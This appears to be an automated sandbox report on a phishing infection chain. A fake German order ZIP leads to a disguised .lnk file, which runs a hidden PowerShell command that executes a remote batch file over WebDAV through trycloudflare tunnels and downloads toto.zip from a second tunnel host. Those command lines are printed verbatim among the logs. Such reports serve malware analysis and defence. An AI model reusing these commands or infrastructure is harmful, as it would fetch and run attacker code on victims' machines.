Source: rundll32.exe, 00000018.00000002.1742704031.00000289049E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnkrw
Source: rundll32.exe, 00000018.00000002.1742917977.0000028904C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnks=C:
Source: rundll32.exe, 00000011.00000002.1552005067.000001EC8FF00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISION
Source: rundll32.exe, 00000016.00000002.1566077343.0000020B53A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ESSOR_REVISIONJ
Source: rundll32.exe, 00000016.00000002.1565812654.0000020B53778000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/OT
Source: rundll32.exe, 00000011.00000002.1551843850.000001EC8FB58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/ll
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686528000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat4
Source: rundll32.exe, 0000001F.00000002.1961788980.0000020686520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batC:
Source: rundll32.exe, 0000001F.00000002.1962100847.0000020686810000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://theme-crack-emissions-perspectives.trycloudflare.com/tue.batq

Uses HTTPS

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 58436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58413 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58418
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58417
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58419
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58414
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58413
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58416
Source: unknown	Network traffic detected: HTTP traffic on port 58423 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58415
Source: unknown	Network traffic detected: HTTP traffic on port 58426 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58421
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58420
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58423
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58422
Source: unknown	Network traffic detected: HTTP traffic on port 58439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58416 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58433 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58425
Source: unknown	Network traffic detected: HTTP traffic on port 58422 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58424
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58427
Source: unknown	Network traffic detected: HTTP traffic on port 58425 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58426
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58432
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58431
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58434
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58433
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58430
Source: unknown	Network traffic detected: HTTP traffic on port 58415 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58439
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58436
Source: unknown	Network traffic detected: HTTP traffic on port 58421 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58435
Source: unknown	Network traffic detected: HTTP traffic on port 58428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58437
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58442
Source: unknown	Network traffic detected: HTTP traffic on port 58418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58414 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 58437 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58427 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58448
Source: unknown	Network traffic detected: HTTP traffic on port 58424 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58412
Source: unknown	Network traffic detected: HTTP traffic on port 58430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 58417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58434 -> 443

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:49703 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.17:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 173.223.108.114:443 -> 192.168.2.17:58412 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58413 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58414 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58415 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58416 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:58418 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.17:58419 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58421 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.73:443 -> 192.168.2.17:58426 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.209.166:443 -> 192.168.2.17:58428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58430 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.17:58435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.231.132:443 -> 192.168.2.17:58442 version: TLS 1.2

System Summary

Downloads suspicious files via Chrome

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\BestellungVRG020002.zip (copy)

Jump to dropped file

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF6411D8		36_2_00007FF9BF6411D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF641EB1		36_2_00007FF9BF641EB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF8B7009		36_2_00007FF9BF8B7009
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BF8B020D		36_2_00007FF9BF8B020D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB32DA9		36_2_00007FF9BFB32DA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2E0E9		36_2_00007FF9BFB2E0E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB130AE		36_2_00007FF9BFB130AE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB20059		36_2_00007FF9BFB20059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2A887		36_2_00007FF9BFB2A887
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1B098		36_2_00007FF9BFB1B098
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2D850		36_2_00007FF9BFB2D850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1CF9D		36_2_00007FF9BFB1CF9D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB207A5		36_2_00007FF9BFB207A5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1DFC4		36_2_00007FF9BFB1DFC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB23F7D		36_2_00007FF9BFB23F7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB25F3B		36_2_00007FF9BFB25F3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2BEBD		36_2_00007FF9BFB2BEBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1EEC4		36_2_00007FF9BFB1EEC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2759D		36_2_00007FF9BFB2759D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB295CD		36_2_00007FF9BFB295CD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB155D0		36_2_00007FF9BFB155D0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2C56B		36_2_00007FF9BFB2C56B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1FD45		36_2_00007FF9BFB1FD45
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2B495		36_2_00007FF9BFB2B495
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2643D		36_2_00007FF9BFB2643D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2A3FB		36_2_00007FF9BFB2A3FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB26BFB		36_2_00007FF9BFB26BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1E3B7		36_2_00007FF9BFB1E3B7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB25BBB		36_2_00007FF9BFB25BBB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1EB95		36_2_00007FF9BFB1EB95
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB152E2		36_2_00007FF9BFB152E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB132EF		36_2_00007FF9BFB132EF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2929D		36_2_00007FF9BFB2929D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB20AB9		36_2_00007FF9BFB20AB9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2621D		36_2_00007FF9BFB2621D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2722B		36_2_00007FF9BFB2722B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB19A54		36_2_00007FF9BFB19A54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2B19D		36_2_00007FF9BFB2B19D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB1E189		36_2_00007FF9BFB1E189
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFB2992D		36_2_00007FF9BFB2992D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFC7C63A		36_2_00007FF9BFC7C63A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFDCD261		36_2_00007FF9BFDCD261
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFDCFBF8		36_2_00007FF9BFDCFBF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FF9BFDC91C6		36_2_00007FF9BFDC91C6

Classification label

Source: classification engine

Classification label: mal68.spyw.evad.win@50/61@6/7

Creates files inside the user directory

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps

Jump to behavior

Creates mutexes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Creates temporary files

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ka0uob4e.cto.ps1

Jump to behavior

Executes batch files

Source: unknown

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"

Reads ini files

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Runs a DLL by calling functions

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Spawns processes

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dl.dropboxusercontent.com/scl/fi/kzw07ghqs05mfyhu8o3ey/BestellungVRG020002.zip?rlkey=27cmmjv86s5ygdnss2oa80i1o&st=86cnbbyp&dl=0"
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/DE/bestellung-DKM00392pdf.lnk
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie theme-crack-emissions-perspectives.trycloudflare.com@SSL https://theme-crack-emissions-perspectives.trycloudflare.com/tue.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=1912,i,9342714929990700637,7957857642515349934,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "cmd /c '\\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat' analyze"			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c \\theme-crack-emissions-perspectives.trycloudflare.com@SSL\DavWWWRoot\tue.bat analyze			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\LSBIHQFDVT.pdf"			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 5			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'https://retailer-indicators-resume-key.trycloudflare.com/toto.zip' -OutFile 'C:\Users\user\Downloads\toto.zip' } catch { exit 1 }"			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2276 --field-trial-handle=1564,i,7782112262489688426,12990874366865501672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process created: unknown unknown			Jump to behavior

Tries to load missing DLLs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll			Jump to behavior
